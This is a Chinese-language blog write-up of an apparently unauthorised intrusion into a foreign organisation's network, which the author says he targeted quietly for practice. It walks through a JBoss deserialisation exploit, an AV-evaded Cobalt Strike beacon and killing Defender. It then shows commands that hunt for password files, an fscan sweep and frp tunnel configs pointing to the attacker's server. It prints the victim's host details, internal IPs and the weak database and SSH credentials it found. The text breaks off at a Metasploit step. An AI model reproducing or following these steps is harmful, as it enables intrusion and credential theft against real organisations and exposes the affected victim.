记一次内网横向免杀对抗渗透测试

admin 2023年3月2日11:14:40评论62 views字数 21848阅读72分49秒阅读模式

文章首发在先知社区

https://xz.aliyun.com/t/12141

工具准备

jexboss

Kali Linux

CS 4.3

Windows杀软在线查询一

Windows杀软在线查询二

Windows杀软在线查询三

fscan

潮汐shellcode免杀

LSTAR

CobaltStrike其他插件

PEASS-ng

PrintSpoofer

外网打点

1、为了练习内网横向,悄悄的盯上国外的站点

2、发现jboss网站存在反序列化漏洞,是呀jexboss无法利用成功

python jexboss.py -u https://xx.xx.xx/

3、使用工具java反序列化终极测试工具 by 6哥成功利用

记一次内网横向免杀对抗渗透测试


4、查看当前用户whoami,普通用户

记一次内网横向免杀对抗渗透测试


5、查看IP地址ipconfig

记一次内网横向免杀对抗渗透测试

6、查看是否有杀软tasklist /svc

记一次内网横向免杀对抗渗透测试


7、将查询的内容粘贴到Windows杀软在线查询,发现存在杀软

记一次内网横向免杀对抗渗透测试


8、查看服务器是否出网ping www.baidu.com,很不错,服务器出网

记一次内网横向免杀对抗渗透测试


CS上线

1、因为有杀软,我们要考虑绕过,直接上传CS木马肯定是不行的,本次绕过的是潮汐shellcode免杀,因为很多github上利用python打包的exe文件太大,上传很慢,而潮汐shellcode免杀文件较小,上传快。

2、CS先生成c语言的shellcode

记一次内网横向免杀对抗渗透测试


3、将shellcode内容复制到潮汐网站上,生成的exe上传到目标机器,然后执行命令

C:\usr\desarrollo\jboss-5.1.0.GA\server\sigAmeServer\deploy\ROOT.war\TideAv-Go1-2023-02-04-10-31-21-221261.exe tide

记一次内网横向免杀对抗渗透测试


4、CS成功上线

记一次内网横向免杀对抗渗透测试


权限提升

信息收集

1、查看当前用户及特权

whoami
whoami /priv

记一次内网横向免杀对抗渗透测试


2、查看系统版本及补丁信息

systeminfo

记一次内网横向免杀对抗渗透测试

Nombre de host:                            AMEPROWEBEGAD
Nombre del sistema operativo: Microsoft Windows 10 Pro
Versi¢n del sistema operativo: 10.0.19044 N/D Compilaci¢n 19044
Fabricante del sistema operativo: Microsoft Corporation
Configuraci¢n del sistema operativo: Estaci¢n de trabajo miembro
Tipo de compilaci¢n del sistema operativo: Multiprocessor Free
Propiedad de: appzusr
Organizaci¢n registrada:
Id. del producto: 00331-10000-00001-AA727
Fecha de instalaci¢n original: 13/5/2022, 14:03:47
Tiempo de arranque del sistema: 1/2/2023, 16:50:29
Fabricante del sistema: VMware, Inc.
Modelo el sistema: VMware Virtual Platform
Tipo de sistema: x64-based PC
Procesador(es): 2 Procesadores instalados.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz
Versi¢n del BIOS: Phoenix Technologies LTD 6.00, 12/11/2020
Directorio de Windows: C:Windows
Directorio de sistema: C:Windowssystem32
Dispositivo de arranque: DeviceHarddiskVolume1
Configuraci¢n regional del sistema: ezs-mx;Espa¤ol (M‚xico)
Idioma de entrada: es-mx;Espa¤ol (M‚xico)
Zona horaria: (UTC-06:00) Guadalajara, Ciudad de M‚xico, Monterrey
Cantidad total de memoria f¡sica: 4.095 MB
Memoria f¡sica disponible: 1.201 MB
Memoria virtual: tama¤o m ximo: 4.799 MB
Memoria virtual: disponible: 1.147 MB
Memoria virtual: en uso: 3.652 MB
Ubicaci¢n(es) de archivo de paginaci¢n: C:pagefile.sys
Dominio: ame.local
Servidor de inicio de sesi¢n: \AMEPROWEBEGAD
Revisi¢n(es): 4 revisi¢n(es) instaladas.
[01]: KB5004331
[02]: KB5003791
[03]: KB5006670
[04]: KB5005699
Tarjeta(s) de red: 1 Tarjetas de interfaz de red instaladas.
z [01]: Intel(R) PRO/1000 MT Network Connection
Nombre de conexi¢n: Ethernet0
DHCP habilitado: No
Direcciones IP
[01]: 172.16.2.100
[02]: fe80::591:ae09:eee1:888e
Requisitos Hyper-V: Se detect¢ un hipervisor. No se mostrar n las caracter¡sticas necesarias para Hyper-V.

3、查看开放的端口服务netstat -ano

Conexiones activas

Proto Direcci¢n local Direcci¢n remota Estado PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 600
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1090 0.0.0.0:0 LISTENING 7600
TCP 0.0.0.0:1098 0.0.0.0:0 LISTENING 7600
TCP z 0.0.0.0:1099 0.0.0.0:0 LISTENING 7600
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1072
TCP 0.0.0.0:3873 0.0.0.0:0 LISTENING 7600
TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING 7600
TCP 0.0.0.0:4445 0.0.0.0:0 LISTENING 7600
TCP 0.0.0.0:4446 0.0.0.0:0 LISTENING 7600
TCP 0.0.0.0:4457 0.0.0.0:0 LISTENING 7600
TCP 0.0.0.0:4712 0.0.0.0:0 LISTENING 7600
TCP 0.0.0.0:4713 0.0.0.0:0 LISTENING 7600
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 6652
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:7070 0.0.0.0:0 LISTENING 3564
TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING 7600
TCP 0.0.0.0:8080 0.0.0.0:0 z LISTENING 7600
TCP 0.0.0.0:8083 0.0.0.0:0 LISTENING 7600
TCP 0.0.0.0:46305 0.0.0.0:0 LISTENING 7600
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 832
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 680
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1416
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1612
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 2452
TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 832
TCP 0.0.0.0:49672 0.0.0.0:0 LISTENING 3404
TCP 0.0.0.0:49704 0.0.0.0:0 LISTENING 820
TCP 0.0.0.0:49708 0.0.0.0:0 LISTENING 3048
TCP 0.0.0.0:51407 0.0.0.0:0 LISTENING 7600
TCP 127z.0.0.1:5140 0.0.0.0:0 LISTENING 7172
TCP 127.0.0.1:51411 0.0.0.0:0 LISTENING 7600
TCP 172.16.2.100:139 0.0.0.0:0 LISTENING 4
TCP 172.16.2.100:8080 172.16.12.34:42602 TIME_WAIT 0
TCP 172.16.2.100:8080 172.16.12.34:42610 ESTABLISHED 7600
TCP 172.16.2.100:8080 172.16.12.34:55672 TIME_WAIT 0
TCP 172.16.2.100:8080 172.16.12.34:55686 TIME_WAIT 0
TCP 172.16.2.100:49717 38.90.226.62:8883 ESTABLISHED 3576
TCP 172.16.2.100:50848 172.16.2.100:51407 TIME_WAIT 0
TCP 172.16.2.100:51413 172.16.2.190:1433 ESTABLISHED 7600
TCP 172.16.2.100:51447 172.16.2.190:1433 ESTABLISHED 7600
TCP 172.16.2.100:56063 172.16.2.11:2222 ESTABLISHED 3576
TCP 172.16.2.100:56538 92.223.66.48:443 ESTABLISHED 3564
TCP [::]:135 [::]:0 LISTENINzG 600
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1090 [::]:0 LISTENING 7600
TCP [::]:1098 [::]:0 LISTENING 7600
TCP [::]:1099 [::]:0 LISTENING 7600
TCP [::]:3389 [::]:0 LISTENING 1072
TCP [::]:3873 [::]:0 LISTENING 7600
TCP [::]:4444 [::]:0 LISTENING 7600
TCP [::]:4445 [::]:0 LISTENING 7600
TCP [::]:4446 [::]:0 LISTENING 7600
TCP [::]:4457 [::]:0 LISTENING 7600
TCP [::]:4712 [::]:0 LISTENING 7600
TCP [::]:4713 [::]:0 LISTENING 7600
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:8009 z [::]:0 LISTENING 7600
TCP [::]:8080 [::]:0 LISTENING 7600
TCP [::]:8083 [::]:0 LISTENING 7600
TCP [::]:46305 [::]:0 LISTENING 7600
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 832
TCP [::]:49665 [::]:0 LISTENING 680
TCP [::]:49666 [::]:0 LISTENING 1416
TCP [::]:49667 [::]:0 LISTENING 1612
TCP [::]:49668 [::]:0 LISTENING 2452
TCP [::]:49671 [::]:0 LISTENING 832
TCP [::]:49672 [::]:0 LISTENING 3404
TCP [::]:49704 [::]:0 LISTENING 820
TCP [::]:49708 [::]:0 LISTENING 30z48
TCP [::]:51407 [::]:0 LISTENING 7600
UDP 0.0.0.0:123 *:* 1268
UDP 0.0.0.0:500 *:* 3040
UDP 0.0.0.0:3389 *:* 1072
UDP 0.0.0.0:4500 *:* 3040
UDP 0.0.0.0:5050 *:* 6652
UDP 0.0.0.0:5353 *:* 1432
UDP 0.0.0.0:5355 *:* 1432
UDP 0.0.0.0:50001 *:* 3564
UDP 0.0.0.0:50007 *:* 1240
UDP 0.0.0.0:56152 *:* 1240
UDP 0.0.0.0:61593 *:* 1240
UDP 0.0.0.0:64843 *:* 1240
UDP 127.0.0.1:1900 *z:* 2876
UDP 127.0.0.1:50434 *:* 832
UDP 127.0.0.1:55588 *:* 2876
UDP 127.0.0.1:65220 *:* 1868
UDP 127.0.0.1:65222 *:* 2360
UDP 172.16.2.100:137 *:* 4
UDP 172.16.2.100:138 *:* 4
UDP 172.16.2.100:1900 *:* 2876
UDP 172.16.2.100:55587 *:* 2876
UDP [::]:123 *:* 1268
UDP [::]:500 *:* 3040
UDP [::]:3389 *:* 1072
UDP [::]:4500 *:* 3040
UDP [::]:5353 *:* 1432
z UDP [::]:5355 *:* 1432
UDP [::1]:1900 *:* 2876
UDP [::1]:55586 *:* 2876
UDP [fe80::591:ae09:eee1:888e%13]:1900 *:* 2876
UDP [fe80::591:ae09:eee1:888e%13]:55585 *:* 2876

4、查看网卡信息shell ipconfig /all

Configuración IP de Windows

Nombre de host. . . . . . . . . : AMEPROWEBEGAD
Sufijo DNS principal . . . . . : ame.local
Tipo de nodo. . . . . . . . . . : híbrido
Enrutamiento IP habilitado. . . : no
Proxy WINS habilitado . . . . . : no
Lista de búsqueda de sufijos DNS: ame.local

Adaptador de Ethernet Ethernet0:

Sufijo DNS específico para la conexión. . :
Descripción . . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Dirección física. . . . . . . . . . . . . : 00-50-56-B2-9D-FE
DHCP habilitado . . . . . . . . . . . . . : no
Configuración automática habilitada . . . : sí
Vínculo: dirección IPv6 local. . . : fe80::591:ae09:eee1:888e%13(Preferido)
Dirección IPv4. . . . . . . . . . . . . . : 172.16.2.100(Preferido)
Máscara de subred . . . . . . . . . . . . : 255.255.255.0
Puerta de enlace predeterminada . . . . . : 172.16.2.254
IAID DHCPv6 . . . . . . . . . . . . . . . : 100683862
DUID de cliente DHCPv6. . . . . . . . . . : 00-01-00-01-2A-10-71-A7-00-50-56-B2-9D-FE
Servidores DNS. . . . . . . . . . . . . . : 172.16.2.20
10.0.0.1
NetBIOS sobre TCP/IP. . . . . . . . . . . : habilitado

记一次内网横向免杀对抗渗透测试

5、路由表信息shell arp -a

Interfaz: 172.16.2.100 --- 0xd
Dirección de Internet Dirección física Tipo
172.16.2.11 00-50-56-b2-ac-66 dinámico
172.16.2.20 00-50-56-b2-d2-30 dinámico
172.16.2.150 00-90-a9-d6-91-01 dinámico
172.16.2.190 00-50-56-b2-99-b0 dinámico
172.16.2.254 00-00-5e-00-01-02 dinámico
172.16.2.255 ff-ff-ff-ff-ff-ff estático
224.0.0.22 01-00-5e-00-00-16 estático
224.0.0.251 01-00-5e-00-00-fb estático
224.0.0.252 01-00-5e-00-00-fc estático
239.255.255.250 01-00-5e-7f-ff-fa estático

记一次内网横向免杀对抗渗透测试


6、是否存在域环境shell systeminfo,确实存在域环境

记一次内网横向免杀对抗渗透测试

CS自带插件提权

1、首先使用CS自带插件提权,无法提权成功,且提权后,CS就失去主机控制,应该是提权进程被杀软发现(包括第三方提权插件都不行)。

记一次内网横向免杀对抗渗透测试


结束杀软进程

1、我们来尝试一下是否可以关闭杀软,通过上面信息知道杀软进程名MsMpEng.exe,通过进程对比可以发现,杀软已经被我们关闭了。

tskill MsMpEng
tasklist /svc

记一次内网横向免杀对抗渗透测试


Windows-Exploit-Suggester

1、安装更新脚本

python2 -m pip install --user xlrd==1.1.0
python2 windows-exploit-suggester.py --update

2、将上面收集的systeminfo内容复制到systeminfo.txt,查找对应的漏洞

python2 ./windows-exploit-suggester.py --database 2023-02-06-mssb.xls --systeminfo systeminfo.txt

记一次内网横向免杀对抗渗透测试


3、将查找的exp上传测试提权,发现都不成功。

PEASS-ng

1、上传到目标机器,无法执行,被杀软发现了,虽然已经关闭杀软进程,但是过一会,杀软自启动

winPEASany.exe log=result.txt

记一次内网横向免杀对抗渗透测试


查看SAM密码文件

1、SAM密码文件位置

system文件位置:C:WindowsSystem32configSYSTEM
sam文件位置:C:WindowsSystem32configSAM

2、由于不是管理员账号,无法查看

记一次内网横向免杀对抗渗透测试

windows敏感文件

1、查看最近打开的文档

dir %APPDATA%MicrosoftWindowsRecent

2、递归搜索后面文件的password字段

findstr /si password  config.*  *.ini *.txt *.properties

3、递归查找当前目录包含conf的文件

dir /a /s /b "*conf*" > 1.txt

4、递归查找目录下的txt中的password字段

findstr /s /i /c:"Password" 目录*.txt

5、递归查找目录下的敏感文件输出到桌面123.txt中

for /r 目录 %i in (account.docx,pwd.docx,login.docx,login*.xls) do @echo  %i >> C:tmp123.txt

6、指定目录搜索各类敏感文件

dir /a /s /b d:"*.txt"
dir /a /s /b d:"*.xml"
dir /a /s /b d:"*.mdb"
dir /a /s /b d:"*.sql"
dir /a /s /b d:"*.mdf"
dir /a /s /b d:"*.eml"
dir /a /s /b d:"*.pst"
dir /a /s /b d:"*conf*"
dir /a /s /b d:"*bak*"
dir /a /s /b d:"*pwd*"
dir /a /s /b d:"*pass*"
dir /a /s /b d:"*login*"
dir /a /s /b d:"*user*"

7、收集各类账号密码信息

findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

PrintSpoofer提权

1、执行命令PrintSpoofer.exe -i -c cmd无法提权

PrintSpoofer.exe -i -c cmd

记一次内网横向免杀对抗渗透测试


横向渗透

fscan扫描

1、上传fscan,执行shell "C:/Users/appusr/fscan64.exe" -h 172.16.2.1/24,发现存活35个IP,扫出很多网站

(icmp) Target 172.16.2.5      is alive
(icmp) Target 172.16.2.9 is alive
(icmp) Target 172.16.2.11 is alive
(icmp) Target 172.16.2.20 is alive
(icmp) Target 172.16.2.37 is alive
(icmp) Target 172.16.2.38 is alive
(icmp) Target 172.16.2.45 is alive
(icmp) Target 172.16.2.46 is alive
(icmp) Target 172.16.2.47 is alive
(icmp) Target 172.16.2.32 is alive
(icmp) Target 172.16.2.33 is alive
(icmp) Target 172.16.2.31 is alive
(icmp) Target 172.16.2.60 is alive
(icmp) Target 172.16.2.70 is alive
(icmp) Target 172.16.2.72 is alive
(icmp) Target 172.16.2.80 is alive
(icmp) Target 172.16.2.81 is alive
(icmp) Target 172.16.2.86 is alive
(icmp) Target 172.16.2.84 is alive
(icmp) Target 172.16.2.85 is alive
(icmp) Target 172.16.2.82 is alive
(icmp) Target 172.16.2.100 is alive
(icmp) Target 172.16.2.111 is alive
(icmp) Target 172.16.2.117 is alive
(icmp) Target 172.16.2.120 is alive
(icmp) Target 172.16.2.83 is alive
(icmp) Target 172.16.2.138 is alive
(icmp) Target 172.16.2.146 is alive
(icmp) Target 172.16.2.150 is alive
(icmp) Target 172.16.2.170 is alive
(icmp) Target 172.16.2.190 is alive
(icmp) Target 172.16.2.195 is alive
(icmp) Target 172.16.2.200 is alive
(icmp) Target 172.16.2.87 is alive
(icmp) Target 172.16.2.254 is alive
[*] Icmp alive hosts len is: 35
172.16.2.38:22 open
172.16.2.120:21 open
172.16.2.20:22 open
172.16.2.37:22 open
172.16.2.150:21 open
172.16.2.117:22 open
172.16.2.82:22 open
172.16.2.111:22 open
172.16.2.81:22 open
172.16.2.72:22 open
172.16.2.70:22 open
172.16.2.45:21 open
172.16.2.60:22 open
172.16.2.37:80 open
172.16.2.11:80 open
172.16.2.200:22 open
172.16.2.83:22 open
172.16.2.150:22 open
172.16.2.170:22 open
172.16.2.146:22 open
172.16.2.138:22 open
172.16.2.120:80 open
172.16.2.84:80 open
172.16.2.81:80 open
172.16.2.85:80 open
172.16.2.86:80 open
172.16.2.70:80 open
172.16.2.60:80 open
172.16.2.87:22 open
172.16.2.11:135 open
172.16.2.20:135 open
172.16.2.5:135 open
172.16.2.83:80 open
172.16.2.200:80 open
172.16.2.170:80 open
172.16.2.82:80 open
172.16.2.117:80 open
172.16.2.11:139 open
172.16.2.20:139 open
172.16.2.9:139 open
172.16.2.5:139 open
172.16.2.195:135 open
172.16.2.190:135 open
172.16.2.100:135 open
172.16.2.84:135 open
172.16.2.195:139 open
172.16.2.190:139 open
172.16.2.170:139 open
172.16.2.150:139 open
172.16.2.120:139 open
172.16.2.100:139 open
172.16.2.84:139 open
172.16.2.60:139 open
172.16.2.84:443 open
172.16.2.85:443 open
172.16.2.86:443 open
172.16.2.80:443 open
172.16.2.72:443 open
172.16.2.70:443 open
172.16.2.60:443 open
172.16.2.11:443 open
172.16.2.87:443 open
172.16.2.9:445 open
172.16.2.5:445 open
172.16.2.170:443 open
172.16.2.83:443 open
172.16.2.120:443 open
172.16.2.82:443 open
172.16.2.81:443 open
172.16.2.170:445 open
172.16.2.150:445 open
172.16.2.120:445 open
172.16.2.100:445 open
172.16.2.84:445 open
172.16.2.60:445 open
172.16.2.20:445 open
172.16.2.11:445 open
172.16.2.5:5432 open
172.16.2.138:3306 open
172.16.2.38:3306 open
172.16.2.195:1433 open
172.16.2.190:1433 open
172.16.2.11:1433 open
172.16.2.195:445 open
172.16.2.190:445 open
172.16.2.100:8080 open
172.16.2.45:8080 open
172.16.2.9:135 open
172.16.2.86:8000 open
172.16.2.80:80 open
172.16.2.200:5432 open
172.16.2.111:5432 open
172.16.2.120:8080 open
172.16.2.150:9000 open
172.16.2.9:5432 open
172.16.2.85:8000 open

[+] received output:
172.16.2.20:88 open

[+] received output:
172.16.2.100:1099 open
172.16.2.80:2020 open
172.16.2.11:3128 open
172.16.2.120:3128 open

[+] received output:
172.16.2.11:7070 open
172.16.2.70:7070 open
172.16.2.100:7070 open
172.16.2.84:7070 open
172.16.2.100:8009 open

[+] received output:
172.16.2.120:8081 open
172.16.2.100:8083 open
172.16.2.80:8084 open

[+] received output:
172.16.2.72:8200 open
172.16.2.86:8300 open
172.16.2.85:8300 open
172.16.2.20:8443 open

[+] received output:
172.16.2.86:9080 open
172.16.2.85:9080 open
172.16.2.80:9084 open
172.16.2.80:9087 open

[+] received output:
172.16.2.150:9443 open
172.16.2.84:10001 open
172.16.2.84:10002 open

[+] received output:
[*] alive ports len is: 120
start vulscan
[*] NetInfo:
[*]172.16.2.100
[->]AMEPROWEBEGAD
[->]172.16.2.100
[*] NetInfo:
[*]172.16.2.84
[->]ame-ro-nas
[->]172.16.2.84
[*] NetInfo:
[*]172.16.2.5
[->]db_ame
[->]172.16.2.5
[*] NetInfo:
[*]172.16.2.9
[->]backu
[->]172.16.2.9
[*] NetInfo:
[*]172.16.2.11
[->]Srv-Ant-Kas1
[->]172.16.2.11
[*] WebTitle: https://172.16.2.11 code:200 len:102 title:None
[*] 172.16.2.9 (Windows Server 2003 3790 Service Pack 2)
[*] WebTitle: http://172.16.2.117 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.16.2.190 AMEPRODBSIG01.ame.local Windows Server 2016 Standard 14393
[*] NetBios: 172.16.2.11 Srv-Ant-Kas1.ame.local Windows Server 2012 Standard 9200
[*] NetBios: 172.16.2.9 backup.ame.local Windows Server 2003 3790 Service Pack 2
[*] WebTitle: https://172.16.2.82 code:302 len:222 title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.82/restgui/start.html
[*] WebTitle: http://172.16.2.120:3128 code:400 len:3157 title:ERROR: The requested URL could not be retrieved
[*] WebTitle: http://172.16.2.200 code:403 len:4897 title:Apache HTTP Server Test Page powered by CentOS
[*] WebTitle: http://172.16.2.84 code:401 len:0 title:None
[*] WebTitle: https://172.16.2.87 code:200 len:83 title:None
[+] Postgres:172.16.2.200:5432:postgres 123456
[*] WebTitle: http://172.16.2.80 code:301 len:0 title:None ÞÀ│Þ¢¼url: https://172.16.2.80:443/
[*] WebTitle: http://172.16.2.82 code:302 len:208 title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.82:443/
[*] 172.16.2.100 (Windows 10 Pro 19044)
[*] WebTitle: http://172.16.2.11 code:302 len:0 title:None ÞÀ│Þ¢¼url: https://172.16.2.11/
[*] WebTitle: http://172.16.2.83 code:302 len:208 title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.83:443/
[*] WebTitle: http://172.16.2.86 code:301 len:56 title:None ÞÀ│Þ¢¼url: https://172.16.2.86/
[*] WebTitle: http://172.16.2.81 code:302 len:208 title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.81:443/
[*] WebTitle: http://172.16.2.100:8083 code:404 len:0 title:None
[*] NetBios: 172.16.2.195 AMEPRODBSIG01P.ame.local Windows Server 2016 Standard 14393
[*] WebTitle: http://172.16.2.11:3128 code:404 len:196 title:404 Not Found
[*] WebTitle: https://172.16.2.83 code:302 len:222 title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.83/restgui/start.html
[*] WebTitle: https://172.16.2.86 code:200 len:258 title:None
[*] WebTitle: https://172.16.2.70 code:200 len:4149 title:Management
[*] WebTitle: http://172.16.2.150:9000 code:200 len:3509 title:Twonky Server
[*] WebTitle: https://172.16.2.85 code:200 len:258 title:None
[*] WebTitle: http://172.16.2.70 code:302 len:265 title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.70/
[*] WebTitle: https://172.16.2.20:8443 code:302 len:83 title:None ÞÀ│Þ¢¼url: https://172.16.2.20:8443/Login/Index
[*] WebTitle: https://172.16.2.72 code:301 len:84 title:None ÞÀ│Þ¢¼url: https://172.16.2.72/appwall-webui
[*] WebTitle: https://172.16.2.80 code:200 len:3618 title:" + ID_VC_Welcome + "
[*] WebTitle: https://172.16.2.81 code:302 len:222 title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.81/restgui/start.html
[*] WebTitle: http://172.16.2.120 code:200 len:553 title:None
[*] WebTitle: http://172.16.2.37 code:302 len:0 title:None ÞÀ│Þ¢¼url: http://172.16.2.37/app_Login
[*] WebTitle: https://172.16.2.80:8084 code:501 len:0 title:None
[*] NetBios: 172.16.2.170 AMESYNOLOGYAME
[*] WebTitle: https://172.16.2.86:9080 code:202 len:0 title:None
[*] WebTitle: https://172.16.2.120 code:200 len:553 title:None
[*] WebTitle: https://172.16.2.120:8081 code:403 len:266 title:403 Forbidden
[*] WebTitle: https://172.16.2.80:9087 code:404 len:103 title:None
[*] WebTitle: http://172.16.2.80:9084 code:404 len:103 title:None
[*] WebTitle: http://172.16.2.45:8080 code:303 len:0 title:None ÞÀ│Þ¢¼url: http://172.16.2.45:8080/home.htm
[*] WebTitle: https://172.16.2.60 code:200 len:6391 title:None
[*] WebTitle: http://172.16.2.60 code:200 len:6391 title:None
[*] WebTitle: http://172.16.2.120:8080 code:403 len:266 title:403 Forbidden
[+] 172.16.2.5 MS17-010 (Windows Server 2003 3790 Service Pack 2)
[*] WebTitle: http://172.16.2.170 code:200 len:543 title:None
[*] 172.16.2.84 (Windows Storage Server 2016 Standard 14393)
[*] WebTitle: http://172.16.2.85 code:301 len:56 title:None ÞÀ│Þ¢¼url: https://172.16.2.85/
[*] 172.16.2.120 (Unix)
[*] 172.16.2.150 (Windows 6.1)
[*] 172.16.2.60 (Windows 6.1)
[*] NetBios: 172.16.2.120 NVRNVRAME Unix
[*] NetBios: 172.16.2.84 ame-pro-nas.ame.local Windows Storage Server 2016 Standard 14393
[*] NetBios: 172.16.2.60 AMEnas-60 Windows 6.1
[*] WebTitle: https://172.16.2.170 code:200 len:543 title:None

[+] received output:
[*] WebTitle: https://172.16.2.85/ code:200 len:258 title:None
[*] WebTitle: https://172.16.2.86/ code:200 len:258 title:None
[*] WebTitle: https://172.16.2.11/ code:200 len:102 title:None
[*] WebTitle: https://172.16.2.80:443/ code:200 len:3618 title:" + ID_VC_Welcome + "
[*] WebTitle: https://172.16.2.70/ code:200 len:4149 title:Management
[*] WebTitle: https://172.16.2.20:8443/Login/Index code:200 len:2839 title:Zentyal
[*] WebTitle: https://172.16.2.85:9080 code:202 len:0 title:None
[*] WebTitle: http://172.16.2.70:7070 code:404 len:201 title:None
[*] WebTitle: https://172.16.2.81/restgui/start.html code:200 len:2458 title:None
[+] InfoScan:https://172.16.2.80 [VMware vSphere]
[*] WebTitle: https://172.16.2.83/restgui/start.html code:200 len:2458 title:None
[*] WebTitle: https://172.16.2.82/restgui/start.html code:200 len:2458 title:None
[*] WebTitle: http://172.16.2.72:8200 code:301 len:0 title:None ÞÀ│Þ¢¼url: http://172.16.2.72:8200/Console/
[*] WebTitle: http://172.16.2.72:8200/Console/ code:404 len:0 title:None
[*] WebTitle: https://172.16.2.82/restgui/start.html code:200 len:2458 title:None
[*] NetBios: 172.16.2.150 wdmycloud Windows 6.1
[+] InfoScan:https://172.16.2.80:443/ [VMware vSphere]
[*] WebTitle: https://172.16.2.72/appwall-webui/ code:200 len:4366 title:Radware Security Console
[*] WebTitle: http://172.16.2.45:8080/logon.htm code:200 len:2872 title:APC | Log On
[*] WebTitle: https://172.16.2.81/restgui/start.html code:200 len:2458 title:None
[*] WebTitle: http://172.16.2.37/app_Login/ code:200 len:860 title:None

[+] received output:
ÕÀ▓Õ«îµêÉ 65/121 [-] ftp://172.16.2.45:21 wwwroot 123456!a 421 Service not available, closing control connection.

[+] received output:
ÕÀ▓Õ«îµêÉ 109/121 [-] ssh 172.16.2.87:22 root a123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

[+] received output:
[+] SSH:172.16.2.87:22:admin admin

[+] received output:
ÕÀ▓Õ«îµêÉ 110/121 [-] ssh 172.16.2.70:22 admin test ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

[+] received output:
ÕÀ▓Õ«îµêÉ 110/121 [-] ssh 172.16.2.150:22 admin a123456. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

[+] received output:
ÕÀ▓Õ«îµêÉ 113/121 [-] ssh 172.16.2.38:22 admin abc123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

[+] received output:
ÕÀ▓Õ«îµêÉ 114/121 [-] ssh 172.16.2.117:22 admin 2wsx@WSX ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

[+] received output:
ÕÀ▓Õ«îµêÉ 120/121 [-] ftp://172.16.2.150:21 wwwroot 1 Permission denied.

[+] received output:
ÕÀ▓Õ«îµêÉ 120/121 [-] ftp://172.16.2.150:21 data 123456 Permission denied.

[+] received output:
ÕÀ▓Õ«îµêÉ 120/121 [-] ftp://172.16.2.150:21 data sysadmin Permission denied.

[+] received output:
ÕÀ▓Õ«îµêÉ 121/121
[*] µë½µÅÅþ╗ôµØƒ,ÞÇùµùÂ: 10m41.0832671s

2、fscan扫描出来的漏洞,一处postgres弱口令,一处ms17-010,一处ssh弱口令

Postgres:172.16.2.200:5432:postgres 123456
172.16.2.5 MS17-010 (Windows Server 2003 3790 Service Pack 2)
SSH:172.16.2.87:22:admin admin

frp代理

1、由于无法提权成功,所以我们决定换一种思路,先拿下内网中其他主机,提权到管理员权限,最后再对域控渗透。

2、服务器frps.ini设置

[common] 
bind_addr = 0.0.0.0
bind_port = 7080
token = admin123
dashboard_user = admin
dashboard_pwd = admin123

3、启动服务端

./frps -c ./frps.ini

记一次内网横向免杀对抗渗透测试


4、frpc.ini配置如下

[common] 
server_addr = xx.xx.xx.xx
server_port = 7080
token = admin123
tls_enable=true
pool_count=5

[plugin_socks]
type = tcp
remote_port = 4566
plugin = socks5
plugin_user = admin
plugin_passwd = admin123
use_encryption = true
use_compression = true

5、将frpc.exe和frpc.ini上传到受害机

6、CS中运行命令

shell "C:/usr/desarrollo/jboss-5.1.0.GA/server/sigAmeServer/deploy/ROOT.war/frpc.exe -c C:/usr/desarrollo/jboss-5.1.0.GA/server/sigAmeServer/deploy/ROOT.war/frpc.ini"


记一次内网横向免杀对抗渗透测试

7、在服务器上可以看到,已经有连接返回了

记一次内网横向免杀对抗渗透测试


8、在攻击机火狐浏览器foxyproxy插件中配置代理服务器

记一次内网横向免杀对抗渗透测试


9、在火狐浏览器中访问https://172.16.2.72/appwall-webui/成功,说明frp内网穿透成功

记一次内网横向免杀对抗渗透测试


10、为了方便测试,使用proxifier作为全局代理

记一次内网横向免杀对抗渗透测试


msf上线

1、因为扫出来一个ms17010,所以我们需要针对此漏洞进行利用,我选用目前公开的一些工具,虽然都没有免杀,但还是记录一下

kali linux

1、kali Linux中设置proxychains后无法使用,也没有找到原因,因为proxychains只支持http代理,我搭建的环境可以,但真实环境就不得行,搞不懂,有知道的大佬请指点一二,在下感激不尽!

潮汐在线免杀

1、Metasploit 生成 C

